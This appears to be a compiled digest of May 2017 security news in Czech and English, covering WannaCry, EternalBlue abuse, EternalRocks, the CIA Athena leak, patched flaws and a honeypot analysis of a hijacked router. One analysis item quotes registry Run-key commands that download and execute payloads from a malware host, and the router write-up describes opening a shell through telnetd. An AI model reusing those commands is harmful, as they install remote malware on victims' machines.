Dalším způsobem, jak z vás dostat citlivé údaje, je sociální inženýrství. To se používá především u phishingu. Možná si pamatujete na kauzu, kdy se lidem zobrazilo okno s tím, že jim Policie ČR zablokovala počítači a nutila zaplatit pokutu (jinými slovy výkupné). Nejpopulárnější je stále informace o tom, že jste 1 000 000 návštěvník stránky a něco vyhráváte. Ani byste nevěřili, kolik lidí se nachytá.

Zkušení uživatelé jsou schopni se v těchto okénkách orientovat, ale dejte takový počítač do rukou dětem nebo naopak někomu staršímu, kdo ve virtuálním prostředí nevyrostl, a problém je na světě. Nezkušené oko zkrátka nepozná, zda výzva Policie ČR nebo varování o zavirovaném počítači s nabídkou odstranění hrozeb (případně cokoliv jiného), je legitimní či jen blaf ze strany útočníka.

A jak se chránit?

Pokud v prohlížeči používáte Adobe Flash, měli byste přestat. Tento plugin je v dnešní době již překonán technologiemi jako je HTML5. Navíc je děravý jak cedník, takže využít nějaké bezpečnostní chyby nemusí být zase tak těžké. Pokud jej nepotřebujete, je mnohem bezpečnější prohlížet internet bez aktivního Flashe. Naštěstí je ve většině prohlížečů již zablokován a musí být manuálně povolen.

Online Filmy 13
V mnoha případech nepomůže ani AdBlock, jelikož jej většina takových stránek vycítí a uživateli brání v přehrání filmu. Případně nejsou reklamy pochybných zdrojů zaneseny v blacklistu, a proto se beztak zobrazí. Ve výsledku si tak od škodlivého obsahu nepomůžete a slušné weby připravíte o kus žvance. Abychom mu ovšem nekřivdili, od některých pop-up oken vás zachrání.

Pokud si na stránky pochybného charakteru potrpíte, nezapomeňte, že byste měli mít aktualizovaný antivirus. Dokáže relativně úspěšněji hrozby detekovat a odstranit. Problém nastává tehdy, když se jedná o „zero-day“ hrozbu, využívajíc čerstvou chybu v systému, a kterou nemají antiviry zavedeny v databázi.

Když už se vám nějaký bordel do počítače dostane, snažte se jej co nejrychleji odstranit. V tom horším případě se může škodlivý kód pokusit o povolení ve firewallu a udělení výjimky v bezpečnostním softwaru. Vzniká tak díra v rezidentním štítu systému a hacker vám může ukrást citlivá data.

Závěrem

Na závěr jedna rada nad zlato. Jestli nechcete mít problémy s počítačem a jeho bezpečností, vůbec neotevírejte takové portály, ušetříte si starosti. V dnešní době existuje již mnoho způsobů, jak sledovat filmy online, například za menší poplatek, ať už se jedná o Netflix nebo nějakou jeho českou variantu.

Ano, můžete namítnout, že když se chcete jen podívat na film, nechce se vám platit žádný poplatek. Nicméně to nebylo tématem článku, takže zda je takové jednání správné, necháme na vás.

Critical DoS Flaws Patched in Asterisk Framework

23.5.2017 securityweek Vulnerebility
Updates released on Friday for the Asterisk communications framework address three critical denial-of-service (DoS) vulnerabilities discovered by Sandro Gauci, a penetration tester and researcher who specializes in VoIP and communications systems.

Asterisk, considered the world’s most popular open source communications framework, is used by government agencies, carriers and other businesses, including most Fortune 1000 companies. According to its developers, more than one million IP PBX systems, VoIP gateways, conference servers and other solutions rely on Asterisk.

Gauci discovered in April that the project is affected by three potentially serious vulnerabilities that can be exploited to cause the system to crash. Separate advisories have been published by Asterisk developers for each of the flaws.

The vulnerabilities affect all versions of Asterisk 13, 14 and Certified Asterisk 13.13. The issues have been addressed with the release of versions 13.15.1, 14.4.1 and 13.13-cert4.

One of the security holes can be exploited by a remote attacker to cause Asterisk to exhaust all available memory by sending a specially crafted Signalling Connection Control Part (SCCP) packet. Removing or disabling support for the SCCP protocol prevents potential attacks.

“A remote memory exhaustion can be triggered by sending an SCCP packet to Asterisk system with ‘chan_skinny’ enabled that is larger than the length of the SCCP header but smaller than the packet length specified in the header. The loop that reads the rest of the packet doesn’t detect that the call to read() returned end-of-file before the expected number of bytes and continues infinitely. The ‘partial data’ message logging in that tight loop causes Asterisk to exhaust all available memory,” Asterisk developers wrote in their advisory.

The other two vulnerabilities found by Gauci affect PJSIP, an open source multimedia communication library that implements SIP (Session Initiation Protocol) and other protocols. The flaws can be exploited remotely to cause a crash by sending specially crafted SIP packets.

The latest Asterisk releases include a version of PJSIP that addresses these vulnerabilities. However, other projects using the PJSIP library are vulnerable as well, and they will need to obtain upstream patches to protect their users against attacks.

EternalRocks Network Worm Leverages 7 NSA Hacking Tools

23.5.2017 securityweek BigBrothers
EternalRocks Worm Uses NSA Exploits to Compromise Systems and Install DoublePulsar Backdoor

A recently discovered network worm leverages a total of seven hacking tools stolen from the National Security Agency (NSA)-linked Equation Group.

Dubbed EternalRocks and capable of self-replication, the threat emerged over the past couple of weeks, with the most recent known sample dated May 3. The malware was discovered by security researcher Miroslav Stampar, who also found that the tool was initially called MicroBotMassiveNet.

The seven NSA hacking tools included in the network worm include the EternalBlue, EternalChampion, EternalRomance, and EternalSynergy exploits, along with the DoublePulsar backdoor and the Architouch, and Smbtouch SMB reconnaissance tools.

The exploits were made public in April by the hacker group going by the name of Shadow Brokers and are said to have been stolen from the NSA-linked threat actor Equation Group last year. Within days after the tools were released, Microsoft said that it had already patched the vulnerabilities targeted by the exploits with its March 2017 security updates.

However, because not all vulnerable devices have been patched, these exploits continue to be effective, and the recent WannaCry ransomware outbreak is the best example of that. The WannaCry malware abused the EternalBlue exploit for distribution, and other threats did the same, including the UIWIX ransomware, Adylkuzz botnet, and a stealth Remote Access Trojan.

The EternalRocks worm is yet another malicious program attempting to cash in on the release of these exploits. Its purpose seems pretty straightforward: it compromises systems to install the DoublePulsar backdoor on them.

The worm uses a two-stage infection process to deliver its payload, but appears to be more of a research project at the moment than an actual malicious tool.

“First stage malware UpdateInstaller.exe (got through remote exploitation with second stage malware) downloads necessary .NET components (for later stages) TaskScheduler and SharpZLib from Internet, while dropping svchost.exe and taskhost.exe. Component svchost.exe is used for downloading, unpacking and running Tor from archive.torproject.org along with C&C (command and control) communication requesting further instructions,” Stampar notes.

The second-stage payload is downloaded only after a 24-hour period has passed, and is hidden as the taskhost.exe process. The payload drops the exploit pack shadowbrokers.zip, unpacks contained directories payloads/, configs/ and bins/, and then starts a random scan of opened 445 (SMB) ports on the Internet.

EternalRocks also runs contained exploits (inside directory bins/) and pushes the first stage malware through payloads (inside directory payloads/). Moreover, the running Tor process continues to wait for further instructions from the C&C.

In an emailed comment, Michael Patterson, CEO of Plixer, told SecurityWeek that EternalRocks, currently the “first known malware incorporating all seven of the NSA hacking tools,” is clearly a more stealthy tool, given its delayed Tor communication and that administrators looking to keep their systems safe from this threat might have already lost the battle with it.

“Once a device is infected, applying a subsequent patch does not remove the malware. The most effective way for security teams to monitor for any infected devices is to leverage network traffic analytics to look for any historical Tor connections leaving the organization,” Patterson said.

“The race to detect and stop all malware was lost years ago. Organizations must constantly monitor their environments for anomalous behaviors, maintain a historical forensic database, and have a well-defined storage backup and recovery process for all critical data,” he concluded.

Verizon Messages App Allowed XSS Attacks Over SMS

23.5.2017 securityweek Mobil
Until a few months ago, Verizon’s Messages service was affected by a vulnerability that could have easily been exploited to launch cross-site scripting (XSS) attacks using SMS messages.

Verizon Messages (Message+) is a text and multimedia messaging service that allows users to send and receive messages across multiple types of devices, including mobile and desktop, without interruption.

Researcher Randy Westergren analyzed the application’s SMS feature and after sending some URLs to a test account to see how each type of link is rendered, he noticed that adding single quotation marks to a URL allowed him to break out of the HREF attribute and execute arbitrary JavaScript code.

According to the expert, an attacker simply had to send a specially crafted SMS to the targeted user and they could have taken complete control of the victim’s session. Once the user clicked on the malicious message, the attacker could have taken over any functionality, including to send SMSs on behalf of the victim or intercept messages.

The researcher sent his proof-of-concept (PoC) code along with a video and screenshots to Verizon in mid-November 2016. The flaw was resolved by the telecoms giant within a few weeks, but its details were disclosed only on Sunday.

The vendor addressed the vulnerability using the DOM API, which is the fix suggested by Westergren.

This was not the first time the researcher had found a potentially serious flaw in a Verizon service. In January 2015, Westergren disclosed a vulnerability in Verizon’s FiOS web service that could have been exploited to hijack email accounts.

Last year, the expert discovered a critical security hole in Verizon’s webmail service that could have been leveraged by hackers to silently forward a user’s emails to an arbitrary address.

Windows 7 Most Hit by WannaCry Ransomware

23.5.2017 securityweek Ransomware
Most of the computers affected by the WannaCry ransomware outbreak were running Windows 7, security researchers have revealed.

Initially, the malware was believed to have hit mostly computers running Windows XP, mainly because of its attack vector – exploiting a Server Message Block (SMB) version 1 vulnerability. According to a tweet from Kaspersky Lab’s director of Global Research and Analysis Team Costin Raiu, however, the number of Windows XP infections was insignificant.

Windows 7 x64 machines were hit the most, accounting for 60.35% of infections, with Windows 7 x86 coming in second, at 31.72%, the researcher also revealed. These two Windows 7 versions, along with Windows 7 Home x64 and x86 editions, accounted for around 98% of all WannaCry infections, it seems.

WannaCry made a name for itself after researchers discovered it had a worm component abusing the NSA-linked EternalBlue and DoublePulsar exploits to automatically spread to other vulnerable machines. The exploit was said to target all Windows versions from XP to 8.1 (Windows Server 2003 & 2008 as well), but the worm is now said to be reliable only when hitting Windows 7.

Actual infection numbers aren’t out yet, but researchers estimate that around 420,000 machines have been hit by the ransomware to date. Because a researcher registered a kill-switch domain soon after the outbreak started (upon infection, the malware would beacon to a hardcoded domain and terminate its process when receiving a response), only some of these machines ended up infected with WannaCry.

Microsoft resolved the targeted SMB vulnerability in March and also released an emergency patch for unsupported platform versions on May 13, only one day after the ransomware outbreak started. In the aftermath of WannaCry, however, researchers discovered that both a crypto-currency mining botnet and a backdoor had been abusing the exploit for weeks. The exploit is also used by a ransomware family called UIWIX.

WannaCry hasn’t infected only PCs, but other types of machines as well, including medical devices. In fact, Britain’s National Health Service (NHS) was among the first organizations to have been hit by the malware.

Soon after the initial wave of infections, security researchers started observing new WannaCry variations, including some that didn’t use a kill-switch domain. What’s more, Cyphort researchers reported last week that a new ransomware variant was using a kill-switch domain that couldn’t be registered.

The variant uses a domain in the .test Top Level Domain, which cannot be registered, as it is reserved by the IETF (Internet Engineering Task Force) for testing purposes only, Cyphort says. Because the sample has been submitted to VirusTotal from 4 different countries (Germany, Australia, Denmark and South Korea), it’s unlikely that it is a test.

“It seems that the cyber criminals found a smarter way to evade sandbox detection by checking on a site that researchers cannot sinkhole. This technique allows the malware to spread again unchallenged. It is crucial that people patch Windows machines as soon as possible to close the SMB vulnerability and stop the spread of this ransomware. In the meantime, make sure you have a good backup of your important files,” Cyphort says.

In the meantime, security researchers are working on tools that can help WannaCry victims recover their files without paying the ransom. One of them is Wannakey, designed to extract key material from infected Windows XP PCs. However, it requires a second tool to decrypt files.

Building on Wannakey and already tested by Europol, a tool called wanakiwi appears more suited for the file decryption/restoration operation. One thing that both tools require, however, is that the WannaCry-infected computers haven’t been rebooted after the encryption took place. Already confirmed to work on Windows XP, 7, and Server 2003 (x86), wanakiwi might also work on Vista and Server 2008 and 2008 R2.

VMware Patches Workstation Vulnerabilities

23.5.2017 securityweek Vulnerebility
VMware informed customers last week that updates released for the Linux and Windows versions of Workstation patch privilege escalation and denial-of-service (DoS) vulnerabilities.

One of the flaws, discovered by Jann Horn of Google Project Zero and tracked as CVE-2017-4915, affects VMware Workstation Pro and Player 12.x on Linux. The weakness has been classified as “important” severity.

The security hole, described as an insecure library loading vulnerability, allows an unprivileged host user to escalate their privileges to root on the host via ALSA sound driver configuration files.

The second vulnerability, identified by Borja Merino and tracked as CVE-2017-4916, affects VMware Workstation Pro and Player 12.x on Windows.

This “moderate” severity flaw is a NULL pointer dereference issue that exists in the vstor2 driver. An attacker with regular host user privileges can exploit the vulnerability to cause a DoS condition on the host machine.

The vulnerabilities have been patched with the release of VMware Workstation 12.5.6. There are no workarounds for either of the flaws.

VMware has released eight other security advisories this year, including for an Apache Struts 2 vulnerability that had been exploited in the wild, and security bugs disclosed by white hat hackers at this year’s Pwn2Own competition.

Exploits involving VMware virtual machine escapes earned participants more than $200,000 at Pwn2Own 2017. Researchers at Qihoo 360 received $105,000 for an Edge exploit that achieved a VM escape, while Tencent Security’s Team Sniper earned $100,000 for a Workstation exploit.

Hrdinou být nechtěl. Tento mladík zachraňoval svět před vyděračským virem

22.5.2017 Novinky/Bezpečnost Viry
Řádění vyděračského viru WannaCry, který napadl za pouhých pár hodin na 300 tisíc zařízení ve více než 150 zemích světa, zastavil teprve 22letý bezpečnostní expert Marcus Hutchins. Zpráva o jeho boji proti počítačovým pirátům obletěla svět a z něho se stala během pár dní celebrita. On sám britskému deníku The Daily Mail řekl, že o žádné ovace nestál a jsou mu spíše na obtíž.

Bezpečnostní expert Marcus Hutchins
FOTO: Frank Augstein, ČTK/AP
Marcus pracuje pro server MalwareTech.com již několik let. Právě zmiňované stránky pravidelně sledují dění na internetu a u nových hrozeb se snaží zjistit jejich funkčnost, aby je mohl s kolegy následně vyřadit zcela z provozu.

A to dělal tento mladík i předminulý týden, kdy se mu podařilo zastavit řádění viru WannaCry. Tehdy však jeho jméno nikdo neznal – mladík se snažil pracovat v anonymitě. Jak sám říká, o žádnou slávu nestál.

Pět minut slávy
S ohledem na jeho hrdinský čin – tak alespoň jeho práci označují zahraniční média – se však před světem schovat nemohl. „Nesnažil jsem se stát slavným, naopak jsem chtěl pracovat anonymně,“ prohlásil pro server Guardian bezpečnostní expert.

„Jsem jen náhodný hrdina. Vím, že jde jen o pět minut slávy, ale je to pro mě i tak hrozně,“ neskrýval Marcus nechuť ze zájmu médií a slávy. „Stát v záři reflektorů mě nebaví,“ doplnil.

Stěžoval si i na to, že je na sociálních sítích doslova pod palbou nejrůznějších fanoušků. „V podstatě jsem ze dne na den přišel o veškeré soukromí, prohlásil 22letý bezpečnostní expert.

Jakkoliv své zásluhy za zastavení škodlivého kódu WannaCry bagatelizuje, byl to právě on, kdo skutečně pomohl před infikováním ochránit přinejmenším desetitisíce dalších strojů a šíření viru zastavil.

Šlo vlastně o náhodu
Britský bezpečnostní expert se k informacím o nezvaném návštěvníku dostal předminulý pátek jako jeden z prvních. Dokonce se mu podařilo získat funkční vzorek vyděračského viru. „Když jsem jej začal zkoumat v uzavřeném prostředí, všiml jsem si, že se snaží při komunikaci kontaktovat internetovou doménu, která není zaregistrovaná,“ přiblížil mladík na svém blogu.

Konkrétně šlo o web iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com. Díky tomu mohl získat více informací o této nebezpečné hrozbě.

Po několikahodinovém zkoumání mladík přišel na to, že to skutečně souvisí se zaregistrováním volné domény. Kyberzločinci pravděpodobně nechali ve WannaCry takovouto bezpečnostní pojistku, aby mohli na dálku v případě potřeby šíření viru jednoduše vypnout. Například i kvůli tomu, aby je bezpečnostní experti nemohli vystopovat zpět.

Teprve 22letý bezpečnostní expert však tuto pojistku odhalil dříve, než ji mohli použít. A to byl poměrně heroický výkon – obzvláště s ohledem na to, že si bral týden dovolenou a k počítači se připojil spíše jen ze zvědavosti.

Windows 7 poháněl 98 % počítačů napadených WannaCryem. Nástroje na dešifrování dat vydány

22.5.2017 CNEWS.cz Viry
První zjištění ukazuje, že děravá Ikspéčka již dnes útočnictvo nezajímají. Vznikly již nástroje na dešifrování dat, jsou však významně limitovány.

Nedávný globální útok ransomwaru WannaCry zdůraznil nutnost diskutovat o určitých otázkách. Kdo za něj nese zodpovědnost? Někteří vinu svalují na Microsoft, který pro změnu vidí problém v neaktualizovaných počítačích. Sám dokonce vydal záplatu pro Windows XP, ačkoli nejspíš nikdo neočekával, že by k tomu ještě někdy mělo dojít. První „bonusová“ záplata přišla krátce po skončení životnosti operačního systému v roce 2014.

Opravení díry, kterou využíval WannaCry, představuje druhou záplatu, kterou Microsoft neměl povinnost vyprodukovat. Zatímco se někteří oprávněně obávají především počítačů s Ikspéčky, které tedy již nejsou podporovány a jejichž podíl používanosti podle Net Applications.com činí stále zhruba 7 %, ruský antivirový specialista Kaspersky Lab odhalil zajímavou věc.

Ve skutečnosti podle výzkumu firmy WannaCry napadl v drtivé většině případů počítače s Windows 7. Konkrétně se na tyto stroje ransomware dostal v 98,35 % ze všech případů. Počet napadených počítačů s Windows XP je naproti tomu zanedbatelný. Nelze se divit, protože Sedmičky pohání většinu klasických počítačů (48,5 % v dubnu podle Net Applications.com). Ikspéčka se navíc na západě již skoro nevyskytují, relativně vysoký podíl si drží zejména kvůli Číně.

Fakt, že ransomware WannaCry na počítače s Ikspéčky necílil, potvrzuje, že se dnes jedná o relativně bezvýznamnou platformou z pohledu útočnictva. Strojů s Desítkami se již nachází dost, ale tento systém pro změnu nelze stejným útokem napadnout.

Nástroje na dešifrování dat zašifrovaných ransomwarem WannaCry

Dnes již (možná) můžete své soubory zašifrované ransomwarem WannaCry zachránit díky nástroji, jehož funkčnost byla otestována v systémech Windows XP, 7 (32bitová verze), 2003, Vista a Windows Server 2008. Stále platí, že zálohování a obnova dat ze zálohy je vaší největší nadějí na úspěch a nejlepší obranou. Uvedený nástroj WannaKey totiž operuje se signifikantními omezeními.

Především počítač nesmí být po nakažení restartován a část paměti, kde se nachází prvočísla využívaná při šifrování, nesmí být přepsána. Na základě práce výzkumníka, který vyprodukoval uvedený nástroj pro dešifrování souborů, vznikl ještě druhý nástroj. WanaKiwi funguje stejně a je omezen stejnými limity, práce s ním je však podle The Hacker News snazší.

WikiLeaks pokračuje v odhalování nástrojů od CIA. Spyware Athena napadá Windows XP až 10

22.5.2017 CNEWS.cz BigBrother
Hackování počítačů ve prospěch státu. Nebo ne?

Ilustrační foto

Tématem posledních dní byl masivní útok ransomwaru, který svět zná pod označením WannaCry. Zpráv o napadených počítačích ale nejspíš nebylo dost, protože organizace WikiLeaks před několika dny zveřejnila informace o projektu Athena. Jedná se o malware vyvinutý americkou CIA ve spolupráci s firmou Siege Technologies.

Z jeho povahy můžeme říct, že se tento škodlivý kód chová jako spyware. Hlásí se z infikovaného počítače a umožňuje svému tvůrci na daném stroji spouštět další škodlivé kódy podle potřeby. V neposlední řadě Athena umožňuje přijímat a hlavně odesílat soubory z nakaženého počítače. Tento spyware je designován pro použití ve Windows od Ikspéček až po Desítky.

Jedná se již o několikáté odhalení škodlivého softwaru od CIA za sebou. Na začátku bylo rozsáhlé odhalení projektu s kódovým označením Vault 7, jenž lze charakterizovat jako sbírku hackovacích nástrojů pro různé platformy. K odhalení došlo 7. března 2017. Od té doby organizace WikiLeaks zveřejnila informace o těchto souvisejících projektech:

Dark Matter (23. března 2017)
Marble Framework (31. března 2017)
Grasshopper (7. dubna 2017)
Hive (14. dubna 2017)
Weeping Angel (21. dubna 2017)
Scribbles (28. dubna 2017)
Archimedes (5. května 2017)
AfterMidnight (12. května 2017)
Athena (19. května 2017)

Honíme botnet: od honeypotu k analýze routeru
22.5.2017 Root.cz BotNet

Vše začalo ve chvíli, kdy nám přišla odpověď na jeden z e-mailů, které jsou automaticky generovány našimi honeypoty v případě detekovaného pokusu o útok. Tato upozornění jsou posílána abuse kontaktům sítě.

Takováto reakce na zprávu z našeho honeypotu pochopitelně zaujala moji pozornost. Požádal jsem tedy dotčeného ISP o pomoc a netrvalo dlouho a na stole jsem měl zapůjčené dva vzorky routeru Billion BiPAC 9800VNXL. Jeden přímo odhalený našimi honepoty a druhý čistý pro porovnání v případě, že by se jednalo o trvalou nákazu.

Po prvním „osahání“ přišlo trochu zklamání. Zařízení nemělo klasický shell, ale jenom jakousi příkazovou řádku na telnetu, která byla pro další analýzu naprosto neužitečná.

Když už jsem pomalu začal vzdávat svoji snahu a smiřoval se s tím, že nebudu schopen porovnat vzorky firmwaru z obou zařízení, zkusil jsem poslední možnost. Připojil jsem zařízení do internetu na veřejnou IP adresu. A vyplatilo se. Přibližně během do dvou hodin byl router plně kompromitovaný a stal se součásti botnetu. Hned jsem ho tedy odpojil od sítě a jal se analyzovat zachycená data.

Ukázalo se že router trpí zranitelností umožňující vzdálenému neautorizovanému útočníkovi spustit libovolný kód. Útok se skládá ze dvou HTTP/SOAP dotazů, přičemž ve druhém byl uschován řetězec:

Došlo tedy ke stažení a spuštění binárky a připojení infikovaného routeru k botnetu. Ze zvědavosti jsem binárku nahrál na Virustotal, ale jak se dalo očekávat, architektury jako například MIPS nejsou úplně zajímavé pro antivirové společnosti, jako podezřelý označil vzorek pouze jeden antivir z 55. Na základě posbíraných dat jsem si napsal krátký skript, který mi umožňoval do routeru posílat příkazy. Ty se nakonec zdrcly jen na vypnutí telnetového démona a jeho opětovné spuštění, ale tentokrát s parametrem -l /bin/sh, což mi udělalo velkou radost, protože jsem měl konečně přístup ke klasickému shellu.

Následně jsem již snadno z obou routerů vytáhl firmware a ověřil kryptografické otisky jednotlivých oddílů. Oddíl s kořenovým adresářem a linuxovým jádrem byly na chlup stejné. Lišily se pouze oddíly bootloaderu a oddíl s uloženou konfigurací. Rozdíl v konfiguracích byl nezajímavý a v bootloaderu se dle očekávání lišila pouze uložená MAC adresa. Porovnání oddílů tedy dopadlo dle očekávání, nebývá totiž časté, aby malware přepsal firmware. Částečně také proto, že oddíl s kořenovým adresářem používá jako systém souborů squashfs a při úpravě je zapotřebí, aby byl přepsán celý oddíl.

Po porovnání firmwarů jsem se vrátil k zpět k prošlému útoku a nalezené zranitelnosti. Samotný malware se choval celkem slušně. Upravil si iptables, tak aby sám sebe ochránil před případnou následnou nákazou zablokováním portů zranitelné služby. A hned na to se jal scanovat náhodné IP adresy za účelem dalšího šíření. Už jen chyběla hláška v telnetu o „zabezpečování zařízení“ a dalo se hádat, že se nejspíš jednalo o botnet Hajime. Ze zvědavosti jsem udělal ještě pár pokusů a nejkratší čas napadení čistého zařízení nepřekročil 10 minut.

Samotná zranitelnost tedy umožňuje vzdálené spuštění libovolného kódu (remote code execution) s maximální délkou řetězce 62 bajtů. Konkrétně se jedná o „vlastnost“ „NewNTPServer“ protokolu TR-064, který je určen pro konfiguraci po lokální síti, ale zřejmě následkem chybné implementace je dostupná i z Internetu v rámci protokolu TR-069. Zranitelnost byla objevena na portu 7547, ale v našem případě se týká i portu 5555, který obsluhuje stejný program ( /userfs/bin/tr69). První informace o této zranitelnosti u jiného routeru se objevila 7. listopadu loňského roku a jednalo se o Eir’s D1000. Zneužití této zranitelnosti je velice snadné a odkazovaná stránka obsahuje i modul do Metasploitu.

Na stránkách výrobce routeru nebyla o dostupnosti jiných verzí firmware ani zmínka, proto jsem jej kontaktoval s popisem nalezené zranitelnosti a dotazem, zda bude připravovat nějakou opravu. Při kontaktování výrobce routeru ohledně zranitelnosti však vyšlo najevo, že nová verze firmwaru již existuje a je přímo přeposílána cílovým zákazníkům (zřejmě ISP). Sami uživatelé pak bohužel nemají možnost zjistit ani existenci nové verze firmware či existenci a závažnost zranitelnosti, kterou jimi používaný produkt obsahuje.

Proto v tuto chvíli zvažujeme možnost vytvoření webových stránek, kde by si lidé mohli nechat automaticky otestovat svoje zařízení na tuto zranitelnost. Jednou z drobných překážek však bude nutnost požadovat od uživatele vypnutí a zapnutí zařízení, protože pokud by již router byl napadený podobným způsobem, zranitelnost by se díky blokovanému portu v iptables neprojevila.

Při hledání souvisejících CVE ID nebylo žádné nalezeno. Po komunikaci s Mitre došlo k přidělení nového CVE-2016–10372 pro zranitelnost dříve objevenou na modemu Eir a po dalším zkoumání pak bude pro BiPAC 9800VNXL přiděleno nové CVE ID a nebo pokud se prokáže, že se jedná o stejný software se stejnou chybou, tak se přidá na seznam zranitelných zařízení pod CVE-2016–10372.

I když se nejedná o zcela novou chybu a ani příliš rozšířená zařízení, jsem rád, že se nám podařilo projít celým řetězcem událostí, od detekování bezpečnostního incidentu vlastními prostředky, přes analýzu celé události až po komunikaci se zainteresovanými stranami.

Závěrem bych chtěl poděkovat za spolupráci jak Radku Jiroutovi z Dial Telecom, za nahlášení zařízení a také Tomáši Hruškovi a Marku Buchtovi z Joyce za zapůjčení zařízení.

WikiLeaks Details Malware Made by CIA and U.S. Security Firm

22.5.2017 securityweek BigBrothers
WikiLeaks has published documents detailing another spy tool allegedly used by the U.S. Central Intelligence Agency (CIA). The latest files describe “Athena,” a piece of malware whose developers claim it works on all versions of Windows.

Documents apparently created between September 2015 and February 2016 describe Athena as an implant that can be used as a beacon and for loading various payloads into memory. The tool also allows its operator to plant and fetch files to or from a specified location on the compromised system.

A leaked diagram shows that Athena can be loaded onto the targeted computer by an asset, a remote operator, or via the supply chain. The implant is said to work on all versions of Windows from XP through 10, including Windows Server 2008 and 2012, on both x86 and x64 architectures.

While WikiLeaks has not made available the actual Athena tool, experts pointed out that the leaked documents include information on file and registry changes made by the implant, which can be useful for determining if a system has been compromised.

The documents also show that Athena was developed in collaboration with Siege Technologies, a U.S.-based company that provides offensive-driven cybersecurity solutions. The firm was acquired last year by Nehemiah Security.

WikiLeaks pointed to an email stolen from Italian spyware maker Hacking Team in which Siege Technologies founder Jason Syversen says he’s “more comfortable working on electronic warfare.”

Since March 8, when it first announced the Vault 7 files focusing on the CIA’s hacking capabilities, WikiLeaks has regularly published documents describing various implants allegedly used by the agency. The latest leaks have focused on Windows hacking tools, including for man-in-the-middle (MitM) attacks on the LAN, for hampering malware attribution and analysis, and creating custom malware installers.

Many of the tech companies whose tools are targeted by the Vault 7 exploits claimed their latest products are not affected. Only Cisco admitted finding a critical vulnerability that had exposed many of the company’s switches.

The Vault 7 files and the exploits leaked by the hacker group called Shadow Brokers, including ones used in the recent WannaCry ransomware attacks, have once again brought exploit stockpiling by governments into the spotlight.

“We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world. Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,” said Microsoft president and chief legal officer Brad Smith.

In response to concerns over the stockpiling of exploits, a group of U.S. lawmakers last week proposed a new bill, the “Protecting Our Ability to Counter Hacking Act of 2017” (PATCH Act), which aims to help find a balance between national security needs and public safety.

At least 3 different groups have been leveraging the NSA EternalBlue exploit, what’s went wrong?
22.5.2017 securityaffairs BigBrothers

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.
In the last days, security experts discovered numerous attacks that have been leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.

The Shadow Brokers hacker group revealed the exploit for the SMB vulnerability in April, but according to malware researchers, other threats used it such as the Adylkuzz botnet that is active since April 24.

Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.

The RAT didn’t show worm network worm capabilities like the WannaCry ransomware.

The malware is delivered from an IP (182.18.23.38) located in China.

“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”

Once infected a system, the malicious code closes the port 445 to prevent other malware from abusing the same SMB flaw.

This aspect suggests the attacker was aware of the EternalBlue vulnerability.

“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs.”

The RAT sets the following Registry Run entries to download and execute additional malware.

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start1” /d “msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q” /f
The malicious code attempts to delete a number of users and terminate and/or delete various files or processes. The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The malware can be instructed by the C&C server to execute various commands, including the screen monitoring, capturing audio and video, monitoring keystrokes, transfer data, deleting files, terminating processes, downloading and executing files and many other operations.

The report published by Cyphort included the Indicators of Compromise for this specific threat.

The facts that multiple groups have been exploiting ETERNALBLUE weeks before WannaCry is also demonstrated by an analysis published by Secdo.

Secdo claims to have found evidence of ransomware abusing EternalBlue flaw weeks before WannaCry emerged.

“Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

EternalBlue SMB flaw

The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.

Recently experts at Heimdal discovered the UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.

Like the WannaCry, UIWIX exploits the same vulnerability in Windows SMB protocol, but the new threat has the ability to run in the memory of the infected system after the exploiting of the EternalBlue.

In late April, The experts at Secdo also discovered another attack exploiting the EthernalBlue vulnerability, it was associated with a Chinese threat actor that used a botnet to distribute a backdoor.

“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.

“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”

Summarizing, at least 3 different groups have been leveraging the NSA exploit weeks before the WannaCry, this means a significant portion of the security community failed to monitor the threat or that failed to share the information about the attacks they have observed.

The success of EternalBlue attacks are the failure of our current model of cyber security.

Netgear Now Collects Router 'Analytics Data' — Here’s How to Disable It
22.5.2017 CyberSpy

Is your router collects data on your network?
Netgear last week pushed out a firmware update for its wireless router model NightHawk R7000 with a remote data collection feature that collects router's analytics data and sends it to the company's server.
For now, the company has rolled out the firmware update for its NightHawk R7000, but probably other router models would receive the update in upcoming days.
The Netgear's alleged router analytics data collects information regarding:
Total number of devices connected to the router
IP address
MAC addresses
Serial number
Router's running status
Types of connections
LAN/WAN status
Wi-Fi bands and channels
Technical details about the use and functioning of the router and the WiFi network.
The company said it is collecting the data for routine diagnostic to know how its products are used and how its routers behave.
